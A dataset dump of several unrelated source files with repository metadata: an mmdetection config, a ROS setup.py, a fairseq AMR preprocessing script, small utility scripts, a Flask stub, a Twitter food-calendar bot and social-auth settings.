dict(type='LoadImageFromFile'), #加载图片的pipline
dict(
type='MultiScaleFlipAug',
img_scale=(3400, 1000), #最大test scale
flip=True, #测试时是否翻转图片
transforms=[
dict(type='Resize', keep_ratio=True), #保持原始比例的resize
dict(type='RandomFlip'), #
dict(type='Normalize', **img_norm_cfg), #规范化
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']), #将图片转为tensor
dict(type='Collect', keys=['img']), #获取关键信息的pipline
])
]
data = dict(
samples_per_gpu=2,
workers_per_gpu=1,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train0331.json',
img_prefix=data_root + 'train_image_low_1200/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val0331.json',
img_prefix=data_root + 'defect_images/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val0331.json',
img_prefix=data_root + 'defect_images/',
pipeline=test_pipeline))
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[16, 22])
total_epochs = 24
checkpoint_config = dict(interval=5)
work_dir = '../data/work_dirs/faster_rcnn_r50_fpn_2x_l1200' | 40.803279 | 105 | 0.664524 |
ace72e07c225cfb0894e647b110a7647eeadd15c | 1,609 | py | Python | examples_tf2_py/setup.py | fujitatomoya/geometry2 | f72c9d31a95b1863d7fd0fdbac77102b674f3317 | [
"BSD-3-Clause"
] | null | null | null | examples_tf2_py/setup.py | fujitatomoya/geometry2 | f72c9d31a95b1863d7fd0fdbac77102b674f3317 | [
"BSD-3-Clause"
] | null | null | null | examples_tf2_py/setup.py | fujitatomoya/geometry2 | f72c9d31a95b1863d7fd0fdbac77102b674f3317 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
# Packaging metadata for the examples_tf2_py package (keywords mark it as a
# ROS package; data_files register it with the ament resource index).
package_name = 'examples_tf2_py'
setup(
    name=package_name,
    version='0.26.0',
    packages=[package_name],
    data_files=[
        ('share/ament_index/resource_index/packages',
            ['resource/' + package_name]),
        ('share/' + package_name, ['package.xml']),
        ('share/' + package_name + '/launch', ['launch/broadcasters.launch.xml']),
    ],
    install_requires=['setuptools'],
    zip_safe=True,
    author='Shane Loretz',
    author_email='sloretz@openrobotics.org',
    maintainer='Alejandro Hernandez Cordero, Chris Lalancette',
    maintainer_email='alejandro@openrobotics.org, clalancette@openrobotics.org',
    keywords=['ROS'],
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Programming Language :: Python',
        'Topic :: Software Development',
    ],
    description=(
        'Has examples of using the tf2 python api.'
    ),
    license='Apache License, Version 2.0',
    tests_require=['pytest'],
    # console scripts exposing each example as a runnable command
    entry_points={
        'console_scripts': [
            'static_broadcaster = examples_tf2_py.static_broadcaster:main',
            'dynamic_broadcaster = examples_tf2_py.dynamic_broadcaster:main',
            'frame_dumper = examples_tf2_py.frame_dumper:main',
            'waits_for_transform = examples_tf2_py.waits_for_transform:main',
            'blocking_waits_for_transform = examples_tf2_py.blocking_waits_for_transform:main',
            'async_waits_for_transform = examples_tf2_py.async_waits_for_transform:main',
        ],
    },
)
| 36.568182 | 95 | 0.661902 |
ace72ebfbbbea50cc8a5e605f5dff098dd1abd24 | 14,197 | py | Python | fairseq_ext/preprocess_bart.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 76 | 2019-11-25T04:00:15.000Z | 2022-03-31T00:33:44.000Z | fairseq_ext/preprocess_bart.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 22 | 2019-10-10T09:39:24.000Z | 2022-03-28T06:39:06.000Z | fairseq_ext/preprocess_bart.py | IBM/transition-amr-parser | dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e | [
"Apache-2.0"
] | 20 | 2019-10-08T17:02:17.000Z | 2022-03-20T01:43:42.000Z | #!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
"""
Data pre-processing: build vocabularies and binarize training data.
"""
import os
import shutil
from collections import Counter
import numpy as np
# from fairseq import options, tasks, utils
from fairseq import tasks
# from fairseq.data import indexed_dataset
from fairseq.binarizer import Binarizer
from multiprocessing import Pool
from fairseq.tokenizer import tokenize_line
from fairseq_ext.utils_import import import_user_module
from fairseq_ext.data import indexed_dataset
from fairseq_ext import options
from fairseq_ext.extract_bart.binarize_encodings import make_bart_encodings
def main(args):
import_user_module(args)
print(args)
# to control what preprocessing needs to be run (as they take both time and storage so we avoid running repeatedly)
run_basic = True
# this includes:
# src: build src dictionary, copy the raw data to dir; build src binary data (need to refactor later if this is not needed)
# tgt: split target pointer values into a separate file; build tgt dictionary, binarize the actions and pointer values
run_act_states = True
# this includes:
# run the state machine in canonical mode to get states information to facilitate modeling;
# takes about 1 hour and 13G space
run_roberta_emb = True
# this includes:
# for src sentences, use pre-trained RoBERTa model to extract contextual embeddings for each word;
# takes about 10min for RoBERTa base and 30 mins for RoBERTa large and 2-3G space;
# this needs GPU and only needs to run once for the English sentences, which does not change for different oracles;
# thus the embeddings are stored separately from the oracles.
if os.path.exists(os.path.join(args.destdir, '.done')):
print(f'binarized actions and states directory {args.destdir} already exists; not rerunning.')
run_basic = False
run_act_states = False
if os.path.exists(os.path.join(args.embdir, '.done')):
print(f'pre-trained embedding directory {args.embdir} already exists; not rerunning.')
run_roberta_emb = False
os.makedirs(args.destdir, exist_ok=True)
os.makedirs(args.embdir, exist_ok=True)
target = not args.only_source
task = tasks.get_task(args.task)
# preprocess target actions files, to split '.actions' to '.actions_nopos' and '.actions_pos'
# when building dictionary on the target actions sequences
# split the action file into two files, one without arc pointer and one with only arc pointer values
# and the dictionary is only built on the no pointer actions
if run_basic:
assert args.target_lang == 'actions', 'target extension must be "actions"'
actions_files = [f'{pref}.{args.target_lang}' for pref in (args.trainpref, args.validpref, args.testpref)]
task.split_actions_pointer_files(actions_files)
args.target_lang_nopos = 'actions_nopos' # only build dictionary without pointer values
args.target_lang_pos = 'actions_pos'
# set tokenizer
tokenize = task.tokenize if hasattr(task, 'tokenize') else tokenize_line
def train_path(lang):
return "{}{}".format(args.trainpref, ("." + lang) if lang else "")
def file_name(prefix, lang):
fname = prefix
if lang is not None:
fname += ".{lang}".format(lang=lang)
return fname
def dest_path(prefix, lang):
return os.path.join(args.destdir, file_name(prefix, lang))
def dict_path(lang):
return dest_path("dict", lang) + ".txt"
def build_dictionary(filenames, src=False, tgt=False):
assert src ^ tgt
return task.build_dictionary(
filenames,
workers=args.workers,
threshold=args.thresholdsrc if src else args.thresholdtgt,
nwords=args.nwordssrc if src else args.nwordstgt,
padding_factor=args.padding_factor,
# tokenize separator is taken care inside task
)
# build dictionary and save
if run_basic:
# if not args.srcdict and os.path.exists(dict_path(args.source_lang)):
# raise FileExistsError(dict_path(args.source_lang))
# if target and not args.tgtdict and os.path.exists(dict_path(args.target_lang)):
# raise FileExistsError(dict_path(args.target_lang))
if args.joined_dictionary:
assert not args.srcdict or not args.tgtdict, \
"cannot use both --srcdict and --tgtdict with --joined-dictionary"
if args.srcdict:
src_dict = task.load_dictionary(args.srcdict)
elif args.tgtdict:
src_dict = task.load_dictionary(args.tgtdict)
else:
assert args.trainpref, "--trainpref must be set if --srcdict is not specified"
src_dict = build_dictionary(
{train_path(lang) for lang in [args.source_lang, args.target_lang]}, src=True
)
tgt_dict = src_dict
else:
if args.srcdict:
src_dict = task.load_dictionary(args.srcdict)
else:
assert args.trainpref, "--trainpref must be set if --srcdict is not specified"
src_dict = build_dictionary([train_path(args.source_lang)], src=True)
if target:
if args.tgtdict:
tgt_dict = task.load_dictionary(args.tgtdict)
else:
assert args.trainpref, "--trainpref must be set if --tgtdict is not specified"
tgt_dict = build_dictionary([train_path(args.target_lang_nopos)], tgt=True)
else:
tgt_dict = None
src_dict.save(dict_path(args.source_lang))
if target and tgt_dict is not None:
tgt_dict.save(dict_path(args.target_lang_nopos))
# save binarized preprocessed files
def make_binary_dataset(vocab, input_prefix, output_prefix, lang, num_workers):
    """Binarize ``<input_prefix>.<lang>`` with *vocab* into an indexed dataset.

    The input file is split by byte offsets across *num_workers* processes;
    worker 0's share is processed inline below and the other workers' shards
    are merged in afterwards.  EOS appending is deliberately disabled.
    """
    print("| [{}] Dictionary: {} types".format(lang, len(vocab) - 1))
    # Running totals: [number of sequences, number of tokens].
    n_seq_tok = [0, 0]
    # Tokens that were replaced by <unk> during binarization.
    replaced = Counter()

    def merge_result(worker_result):
        # Fold one worker's statistics into the shared totals.
        replaced.update(worker_result["replaced"])
        n_seq_tok[0] += worker_result["nseq"]
        n_seq_tok[1] += worker_result["ntok"]

    input_file = "{}{}".format(
        input_prefix, ("." + lang) if lang is not None else ""
    )
    # Byte offsets partitioning the input file into num_workers chunks.
    offsets = Binarizer.find_offsets(input_file, num_workers)
    pool = None
    if num_workers > 1:
        pool = Pool(processes=num_workers - 1)
        for worker_id in range(1, num_workers):
            prefix = "{}{}".format(output_prefix, worker_id)
            pool.apply_async(
                binarize,
                (
                    args,
                    input_file,
                    vocab,
                    prefix,
                    lang,
                    offsets[worker_id],
                    offsets[worker_id + 1],
                    False,  # note here we shut off append eos
                    tokenize
                ),
                callback=merge_result
            )
        pool.close()

    ds = indexed_dataset.make_builder(dataset_dest_file(args, output_prefix, lang, "bin"),
                                      impl=args.dataset_impl, vocab_size=len(vocab), dtype=np.int64)
    # Worker 0's chunk is binarized in this process while the pool runs.
    merge_result(
        Binarizer.binarize(
            input_file, vocab, lambda t: ds.add_item(t),
            offset=0, end=offsets[1],
            append_eos=False,
            tokenize=tokenize
        )
    )
    if num_workers > 1:
        pool.join()
        for worker_id in range(1, num_workers):
            prefix = "{}{}".format(output_prefix, worker_id)
            temp_file_path = dataset_dest_prefix(args, prefix, lang)
            # Append each worker's shard, then delete its temporary files.
            ds.merge_file_(temp_file_path)
            os.remove(indexed_dataset.data_file_path(temp_file_path))
            os.remove(indexed_dataset.index_file_path(temp_file_path))

    ds.finalize(dataset_dest_file(args, output_prefix, lang, "idx"))

    print(
        "| [{}] {}: {} sents, {} tokens, {:.3}% replaced by {}".format(
            lang,
            input_file,
            n_seq_tok[0],
            n_seq_tok[1],
            100 * sum(replaced.values()) / n_seq_tok[1],
            vocab.unk_word,
        )
    )
def make_dataset(vocab, input_prefix, output_prefix, lang, num_workers=1, dataset_impl=args.dataset_impl):
    """Write one split for *lang*: copy raw text, or binarize for other impls."""
    if dataset_impl == "raw":
        # Copy original text file to destination folder
        output_text_file = dest_path(
            output_prefix + ".{}-{}".format(args.source_lang, args.target_lang),
            lang,
        )
        shutil.copyfile(file_name(input_prefix, lang), output_text_file)
    else:
        make_binary_dataset(vocab, input_prefix, output_prefix, lang, num_workers)
def make_all(lang, vocab, dataset_impl=args.dataset_impl):
    """Build the train/valid*/test* datasets for *lang* from the --*pref files."""
    if args.trainpref:
        make_dataset(vocab, args.trainpref, "train", lang, num_workers=args.workers, dataset_impl=dataset_impl)
    if args.validpref:
        # Comma-separated validation prefixes become valid, valid1, valid2, ...
        for k, validpref in enumerate(args.validpref.split(",")):
            outprefix = "valid{}".format(k) if k > 0 else "valid"
            make_dataset(vocab, validpref, outprefix, lang, num_workers=args.workers, dataset_impl=dataset_impl)
    if args.testpref:
        # Same naming scheme for multiple test sets: test, test1, ...
        for k, testpref in enumerate(args.testpref.split(",")):
            outprefix = "test{}".format(k) if k > 0 else "test"
            make_dataset(vocab, testpref, outprefix, lang, num_workers=args.workers, dataset_impl=dataset_impl)
# NOTE we do not encode the source sentences with dictionary, as the source embeddings are directly provided
# from RoBERTa, thus the source dictionary here is of no use
if run_basic:
    # Emit the source side both as raw text and as an mmap dataset.
    make_all(args.source_lang, src_dict, dataset_impl='raw')
    make_all(args.source_lang, src_dict, dataset_impl='mmap')
    # above: just leave for the sake of model to run without too much change
    # NOTE there are <unk> in valid and test set for target actions
    if target:
        make_all(args.target_lang_nopos, tgt_dict)

    # binarize pointer values and save to file
    # TODO make naming convention clearer
    # assume one training file, one validation file, and one test file
    for pos_file, split in [(f'{pref}.actions_pos', split) for pref, split in
                            [(args.trainpref, 'train'), (args.validpref, 'valid'), (args.testpref, 'test')]]:
        out_pref = os.path.join(args.destdir, split)
        task.binarize_actions_pointer_file(pos_file, out_pref)

    # for dynamic oracle: copy the gold amr with alignments to the data folder
    if args.task == 'amr_action_pointer_bart_dyo':
        for pref, split in [(args.trainpref, 'train'), (args.validpref, 'valid'), (args.testpref, 'test')]:
            # The reference AMR for the dev split is named 'ref_dev.amr'.
            if split == 'valid':
                split_amr = 'ref_dev.amr'
            else:
                split_amr = f'ref_{split}.amr'
            shutil.copyfile(
                os.path.join(os.path.dirname(pref), split_amr),
                os.path.join(args.destdir, f'{split}.aligned.gold-amr')
            )

# save action states information to assist training with auxiliary info
# assume one training file, one validation file, and one test file
if run_act_states:
    task_obj = task(args, tgt_dict=tgt_dict)
    for prefix, split in zip([args.trainpref, args.validpref, args.testpref], ['train', 'valid', 'test']):
        en_file = prefix + '.en'
        actions_file = prefix + '.actions'
        machine_config_file = os.path.join(os.path.dirname(prefix), 'machine_config.json')
        out_file_pref = os.path.join(args.destdir, split)
        task_obj.build_actions_states_info(en_file, actions_file, machine_config_file, out_file_pref,
                                           num_workers=args.workers)
    # create empty file flag
    open(os.path.join(args.destdir, '.done'), 'w').close()

# save RoBERTa embeddings
# TODO refactor this code
if run_roberta_emb:
    make_bart_encodings(args, tokenize=tokenize)
    # create empty file flag
    open(os.path.join(args.embdir, '.done'), 'w').close()

print("| Wrote preprocessed oracle data to {}".format(args.destdir))
print("| Wrote preprocessed embedding data to {}".format(args.embdir))
def binarize(args, filename, vocab, output_prefix, lang, offset, end, append_eos=False, tokenize=tokenize_line):
    """Worker entry point: binarize bytes [offset, end) of *filename* with *vocab*.

    Writes a shard under *output_prefix* and returns the Binarizer statistics
    dict (nseq/ntok/replaced) so the parent process can aggregate them.
    """
    ds = indexed_dataset.make_builder(dataset_dest_file(args, output_prefix, lang, "bin"),
                                      impl=args.dataset_impl, vocab_size=len(vocab), dtype=np.int64)

    def consumer(tensor):
        # Append each binarized sentence to the on-disk builder.
        ds.add_item(tensor)

    res = Binarizer.binarize(filename, vocab, consumer, append_eos=append_eos,
                             offset=offset, end=end, tokenize=tokenize)
    ds.finalize(dataset_dest_file(args, output_prefix, lang, "idx"))
    return res
def dataset_dest_prefix(args, output_prefix, lang):
    """Return the destination path prefix for a binarized dataset file.

    The prefix is ``<destdir>/<output_prefix>`` and, when *lang* is given,
    carries a ``.<source>-<target>.<lang>`` suffix identifying the pair.
    """
    if lang is None:
        suffix = ""
    else:
        suffix = ".{}-{}.{}".format(args.source_lang, args.target_lang, lang)
    return "{}/{}{}".format(args.destdir, output_prefix, suffix)
def dataset_dest_file(args, output_prefix, lang, extension):
    """Return the full destination path for a dataset file with *extension* (e.g. "bin"/"idx")."""
    return "{}.{}".format(dataset_dest_prefix(args, output_prefix, lang), extension)
def cli_main():
    """Console entry point: parse fairseq preprocessing options and run main()."""
    parser = options.get_preprocessing_parser()
    args = parser.parse_args()
    main(args)


if __name__ == "__main__":
    cli_main()
| 43.021212 | 127 | 0.625484 |
ace72f23957ef90989b9be0a79f06496d5aa5873 | 321 | py | Python | webscrape.py | V-FOR-VEND3TTA/maps-automation | c5627f01b2aaa95a5c8a5f470fb5686166a1b9fd | [
"MIT"
] | null | null | null | webscrape.py | V-FOR-VEND3TTA/maps-automation | c5627f01b2aaa95a5c8a5f470fb5686166a1b9fd | [
"MIT"
] | null | null | null | webscrape.py | V-FOR-VEND3TTA/maps-automation | c5627f01b2aaa95a5c8a5f470fb5686166a1b9fd | [
"MIT"
] | null | null | null | import webbrowser
import sys
import pyperclip
# Open Google Maps for an address taken from the command line or the clipboard.
if len(sys.argv) > 1:
    # Get address from command line.  Join with spaces: ''.join would glue
    # multi-word addresses together ("19AmeshoffSt"), breaking the lookup.
    address = ' '.join(sys.argv[1:])
else:
    # Get address from clipboard
    address = pyperclip.paste()
webbrowser.open('https://www.google.com/maps/place/' + address)
# 19 Ameshoff St, Johannesburg | 22.928571 | 64 | 0.672897 |
ace72f3a769a9beca0dc24989f95b980d75069b4 | 1,399 | py | Python | match.py | toeybaa/FCN | 062719f85f78d7fb933f6271759bb8b644d2d592 | [
"BSD-2-Clause"
] | 1 | 2016-06-22T05:35:51.000Z | 2016-06-22T05:35:51.000Z | match.py | toeybaa/FCN | 062719f85f78d7fb933f6271759bb8b644d2d592 | [
"BSD-2-Clause"
] | null | null | null | match.py | toeybaa/FCN | 062719f85f78d7fb933f6271759bb8b644d2d592 | [
"BSD-2-Clause"
] | null | null | null | import sys, os
from draw_result import vispair
def pair():
    """Interactively pick a query image and show its most similar match.

    Lists the available query feature files, prompts for a query name on
    stdin, looks the query up in most_similar_pair.txt, visualizes the
    matched pair via the X server and prints the stored distance.
    (Python 2 code: print statements, xrange, raw_input.)
    """
    a = sorted(os.listdir('/home/peth/Databases/rPascal/features/caffe/queries/'))
    for i in xrange(0, len(a)):
        # NOTE(review): rstrip(".npy") strips any trailing '.', 'n', 'p', 'y'
        # characters, not just the extension -- verify names cannot end in
        # those letters, or switch to slicing off the suffix.
        print a[i].rstrip(".npy")
    print 'Choose a query image from above files...'
    path = raw_input("Query Image? : ")
    with open("/home/peth/Databases/rPascal/most_similar_pair.txt") as file:
        checker = False  # becomes True once the query is found
        data = file.readlines()
        for line in data:
            word = line.split()
            if word[0] == path and not checker:
                # print word[1]
                # print type(word[1])
                print "Query founded, Showing the result via X-Server"
                vispair(str(word[0]), str(word[1]))
                checker = True
                # print "Query Image is: " + str(word[0]) + " <==> Most similar Image is: " + str(word[1])
                dist(str(word[0]), str(word[1]))
                break
        if checker is False:
            print "File not found, Exiting the program..."
def dist(q, r):
    """Print the stored distance between query *q* and its match *r*.

    Scans dist_pair.txt for the row whose first column equals *q* and
    prints the pair together with the recorded distance (second column).
    """
    with open('/home/peth/Databases/rPascal/dist_pair.txt') as file:
        data = file.readlines()
        for line in data:
            word = line.split()
            if word[0] == q:
                print "Query Image is: " + q + " <==> Most similar Image is: " + r + " <==> Distance is: " + word[1]
if __name__ == "__main__":
pair()
| 35.871795 | 116 | 0.533238 |
ace73055ab613e0f3db13c8e5d03c420fdd8f8fe | 1,845 | py | Python | processmain.py | SkyfallenHQ/CoProvider-Daemon | 57cc2eb44f21c053db39313840c23c754a0143be | [
"MIT"
] | 1 | 2021-03-01T07:43:32.000Z | 2021-03-01T07:43:32.000Z | processmain.py | SkyfallenHQ/CoProvider-Daemon | 57cc2eb44f21c053db39313840c23c754a0143be | [
"MIT"
] | null | null | null | processmain.py | SkyfallenHQ/CoProvider-Daemon | 57cc2eb44f21c053db39313840c23c754a0143be | [
"MIT"
] | null | null | null | # ____ _ __ _ _ #
# / ___|| | ___ _ / _| __ _| | | ___ _ __ #
# \___ \| |/ / | | | |_ / _` | | |/ _ \ '_ \ #
# ___) | <| |_| | _| (_| | | | __/ | | |#
# |____/|_|\_\\__, |_| \__,_|_|_|\___|_| |_|#
# |___/ #########
# ____ ____ _ _ #
# / ___|___ | _ \ _ __ _____ _(_) __| | ___ _ __ #
# | | / _ \| |_) | '__/ _ \ \ / / |/ _` |/ _ \ '__|#
# | |__| (_) | __/| | | (_) \ V /| | (_| | __/ | #
# \____\___/|_| |_| \___/ \_/ |_|\__,_|\___|_| #
# #
###########################################################################
# (C) 2021 - Skyfallen Developers #
# Skyfallen CoProvider Beta #
# Manage your containerized servers with ease. #
# ----DAEMON CODE---- #
# This file runs everything #
###########################################################################
import flask
from Endpoints import Root
import sqlite3
from os import path
from DB import Initiator
class CoProviderFramework:
    """Bootstraps the CoProvider daemon: SQLite store plus the Flask API."""

    def HandleDaemon(self):
        """Create the Flask app, initialize the DB on first run, register
        the HTTP routes, and block in app.run() until interrupted."""
        app = flask.Flask(__name__)
        # First run is detected by the absence of the SQLite file; this check
        # must happen before sqlite3.connect, which creates the file.
        dbNeedsInit = False
        if (path.exists('CPFD_DB.db') == False):
            dbNeedsInit = True
        conn = sqlite3.connect('CPFD_DB.db')
        if(dbNeedsInit):
            Initiator.SQLInitiator.createTables(conn)

        @app.errorhandler(404)
        def route404(e):
            # All unknown URLs get the API's standard not-found payload.
            return Root.APIEndpoint.serveNotFound()

        @app.route('/createServer/')
        def RouteCreateServer():
            return Root.APIEndpoint.serveCreate(flask.request)

        app.run()  # blocking call; serves requests until shutdown
ace731087913c6a41d14bcd62c8e9dc7105530c5 | 6,787 | py | Python | FoodCalendar/foodcalendertweets.py | contradirony/TwitterFoodCalendar | 8406d4340457cebe7f70c453c1041196634946fa | [
"MIT"
] | null | null | null | FoodCalendar/foodcalendertweets.py | contradirony/TwitterFoodCalendar | 8406d4340457cebe7f70c453c1041196634946fa | [
"MIT"
] | null | null | null | FoodCalendar/foodcalendertweets.py | contradirony/TwitterFoodCalendar | 8406d4340457cebe7f70c453c1041196634946fa | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import recipe as rc
import re
from random import randint
import time
import json
import requests
import os
import sys
#pip install --upgrade google-api-python-client
from googleapiclient.discovery import build
os.chdir(os.path.dirname(sys.argv[0]))
def google_url_shorten(url, api_key):
    """Shorten *url* via the Google URL Shortener API; return the short link.

    NOTE(review): Google has retired the goo.gl shortener service -- confirm
    this endpoint still responds before relying on it.
    """
    # remember to enable https://console.developers.google.com/apis/api/urlshortener.googleapis.com/
    req_url = 'https://www.googleapis.com/urlshortener/v1/url?key=' + api_key
    payload = {'longUrl': url}
    headers = {'content-type': 'application/json'}
    r = requests.post(req_url, data=json.dumps(payload), headers=headers)
    resp = json.loads(r.text)
    # The API returns the shortened URL in the 'id' field.
    return resp['id']
def google_search(search_term, api_key, cse_id, **kwargs):
    """Run a Google Custom Search query and return the raw 'items' result list.

    Extra keyword args (e.g. ``num=1``) are passed straight to cse().list().
    Raises KeyError if the response contains no 'items' (zero results).
    """
    service = build("customsearch", "v1", developerKey=api_key)
    res = service.cse().list(q=search_term, cx=cse_id, **kwargs).execute()
    return res['items']
def export_recipe_tweet(foodimage='', foodurl='', recipename='', recipeid='', googleAPIkey='', ingredient=''):
    ''' input image, url, recipename for text, id for reference and process image and append tweet to scheduler'''
    foodurlshort = google_url_shorten(foodurl, googleAPIkey)
    # NOTE(review): recipenamefix is computed but never used -- presumably a
    # leftover hashtag helper.
    recipenamefix = recipename.lower().replace(" ", "").replace("'", "")
    foodtext = '''Today's recipe is {}: {} {}'''.format(recipename, foodurlshort, '#recipeoftheday')
    if foodimage != '':
        ingredientname = ingredient.lower().replace(" ", "").replace("'", "")
        imagename = '''images/{}_{}_{}.jpg'''.format(time.strftime('%Y-%m-%d'), ingredientname, recipeid)
        imagenamepath = '''{}/{}'''.format(os.getcwd(), imagename)
        # SECURITY: the image URL and path are interpolated into a shell
        # command; a crafted URL could inject shell syntax.  Prefer
        # subprocess.run([...], shell=False) or urllib.request.urlretrieve.
        os.system("wget -O {0} {1}".format(imagenamepath, foodimage))
    # NOTE(review): imagenamepath is only assigned inside the branch above, so
    # calling with foodimage == '' raises NameError here -- confirm callers
    # always supply an image, or default the path.
    res = create_tweet(content=foodtext, image=imagenamepath, scheduledate=time.strftime('%Y-%m-%d'),
                       scheduletime='{}:{}'.format(str(randint(14, 16)).zfill(2), str(randint(0, 59)).zfill(2)))
    return res
def create_tweet(savefile='/HOME_PATH/YOUR_FOLDER_NAME/TweetSchedule.txt', content='',
                 image='', scheduledate='2017-05-06', scheduletime='07:00'):
    """Append a tweet entry to the scheduler file.

    The scheduler line format is::

        a|<content>|<image path>|<YYYY-MM-DD>@<HH:MM>

    Returns 'Tweet created' on success, or 'Tweet too long' when *content*
    exceeds the 140-character limit -- in which case nothing is written.
    """
    # Validate BEFORE writing: the previous version appended the entry first
    # and only then reported the error, leaving an unsendable tweet queued.
    if len(content) > 140:
        return 'Tweet too long'
    tweet_format = 'a' + '|' + content + '|' + image + '|' + scheduledate + '@' + scheduletime
    with open(savefile, 'a') as file:
        file.write('\n' + tweet_format)
    return 'Tweet created'
def main():
    """Daily driver: schedule today's food-calendar tweets.

    If today matches an entry in fooddaysSimple.csv, schedule a national-day
    announcement plus a recipe tweet (Spoonacular first, Google fallback);
    otherwise schedule a random food joke and a food trivia fact.
    """
    # API keys/secrets live in a semicolon-separated key;value CSV.
    authdetailsdf = pd.read_csv("authdetails.csv", sep=';')
    authdetails = dict(zip(list(authdetailsdf.key), list(authdetailsdf.value)))
    googleAPIkey = authdetails['googleAPIkey']
    csname = authdetails['googlecsname']
    spoon_api_key = authdetails['spoon_api_key']
    fooddata = pd.read_csv("fooddaysSimple.csv", sep='\t')
    todayday = int(time.strftime('%d'))
    todaymonth = int(time.strftime('%m'))
    # Boolean mask selecting rows whose Month/Day match today.
    monthday = np.all([fooddata.Month == todaymonth, fooddata.Day == todayday], axis=0)
    datatoday = fooddata[monthday]
    # TODO: should write unit tests for three cases...
    if datatoday.shape[0] > 0:
        ingredient = datatoday['Food'].values[0]
        # there is a national food day entry
        nationalday = 'National ' + ingredient + ' Day!'
        hashtag = '#' + 'national' + ingredient.lower().replace(" ", "").replace("'", "") + 'day'
        # get top google result for information about the day
        results = google_search(nationalday, googleAPIkey, csname, num=1)
        dayurlshort = google_url_shorten(results[0]['link'], googleAPIkey)
        # create one tweet for this, scheduled at a random morning time
        nationaldaytweet = '''Happy {} Learn more about it at: {} {}'''.format(nationalday, dayurlshort, hashtag)
        create_tweet(content=nationaldaytweet, scheduledate=time.strftime('%Y-%m-%d'),
                     scheduletime='{}:{}'.format(str(randint(6, 9)).zfill(2), str(randint(0, 59)).zfill(2)))
        # get recipes that has the national food day in it as an ingredient
        # can be extended with starter, main, and dessert
        a = rc.RecipeClient(spoon_api_key)
        recipes = a.find_by_ingredients(ingredient)
        if len(recipes) > 0:
            recipesdf = pd.DataFrame(recipes)
            # Most-liked recipe first; ties broken by missing-ingredient count.
            # (older pandas used recipesdf.sort(...) instead of sort_values)
            recipesdf.sort_values(['likes', 'missedIngredientCount'], ascending=[False, False], inplace=True)
            foodimageSpoon = recipesdf.iloc[0]['image']
            # Derive the recipe page URL from the image URL by path rewriting.
            foodurlSpoon = re.sub('.png', '', re.sub('.jpg', '', re.sub('recipeImages', 'recipe', foodimageSpoon)))
            recipenameSpoon = recipesdf.iloc[0]['title']
            recipeidSpoon = recipesdf.iloc[0]['id']
            res = export_recipe_tweet(foodimage=foodimageSpoon, foodurl=foodurlSpoon, recipename=recipenameSpoon,
                                      recipeid=recipeidSpoon, googleAPIkey=googleAPIkey, ingredient=ingredient)
            print(res)
        else:
            # Spoonacular returned nothing; fall back to the top Google hit.
            googlerecipe = google_search(ingredient + ' recipe', googleAPIkey, csname, num=1)
            foodurlGoogle = googlerecipe[0]['link']
            foodimageGoogle = googlerecipe[0]['pagemap']['cse_image'][0]['src']
            recipenameGoogle = ingredient
            res = export_recipe_tweet(foodimage=foodimageGoogle, foodurl=foodurlGoogle, recipename=recipenameGoogle,
                                      recipeid='google', googleAPIkey=googleAPIkey, ingredient=ingredient)
            print(res)
    else:
        a = rc.RecipeClient(spoon_api_key)
        # get random joke; retry up to 5 times until one fits in 140 chars
        jokeattempt = 0
        joke = a.random_joke()
        while jokeattempt < 5:
            if len(joke['text']) < 141:
                create_tweet(content=joke['text'], scheduledate=time.strftime('%Y-%m-%d'),
                             scheduletime='{}:{}'.format(str(randint(8, 12)).zfill(2), str(randint(0, 59)).zfill(2)))
                jokeattempt = 100  # sentinel; the break below exits anyway
                break
            else:
                joke = a.random_joke()
                jokeattempt += 1
        # get random trivia; same retry scheme, budgeting for the prefix
        triviaattempt = 0
        trivia = a.random_trivia()
        while triviaattempt < 5:
            if len(trivia['text']) < 141 - len('Food fact: '):
                foodfact = 'Food fact: ' + trivia['text']
                create_tweet(content=foodfact, scheduledate=time.strftime('%Y-%m-%d'),
                             scheduletime='{}:{}'.format(str(randint(14, 18)).zfill(2), str(randint(0, 59)).zfill(2)))
                triviaattempt = 100
                break
            else:
                trivia = a.random_trivia()
                triviaattempt += 1
        print('Joke and trivia for today')
if __name__ == '__main__':
main()
| 48.827338 | 201 | 0.63047 |
ace7313f5ee87a2e9be9131a84245779c4295df8 | 1,125 | py | Python | pdfgridder/socialsettings.py | PDFGridder/PDFGridder | 94bc6e76eadc3799905c905a70228fcd6b30c4fb | [
"MIT"
] | 2 | 2016-09-07T18:32:44.000Z | 2016-11-24T19:45:06.000Z | pdfgridder/socialsettings.py | PDFGridder/PDFGridder | 94bc6e76eadc3799905c905a70228fcd6b30c4fb | [
"MIT"
] | null | null | null | pdfgridder/socialsettings.py | PDFGridder/PDFGridder | 94bc6e76eadc3799905c905a70228fcd6b30c4fb | [
"MIT"
] | null | null | null | import os
# Social-auth settings: all credentials are read from environment variables
# so no secrets live in the repository.
TWITTER_CONSUMER_KEY = os.environ['TWITTER_CONSUMER_KEY']
TWITTER_CONSUMER_SECRET = os.environ['TWITTER_CONSUMER_SECRET']
# Twitter OAuth endpoints.
TWITTER_REQUEST_TOKEN_URL = 'http://twitter.com/oauth/request_token'
TWITTER_ACCESS_TOKEN_URL = 'http://twitter.com/oauth/access_token'
TWITTER_AUTHORIZATION_URL = 'http://twitter.com/oauth/authorize'

FACEBOOK_APP_ID = os.environ['FACEBOOK_APP_ID']
FACEBOOK_API_KEY = os.environ['FACEBOOK_API_KEY']
FACEBOOK_API_SECRET = os.environ['FACEBOOK_API_SECRET']

# Link a social login to an existing account that has the same e-mail.
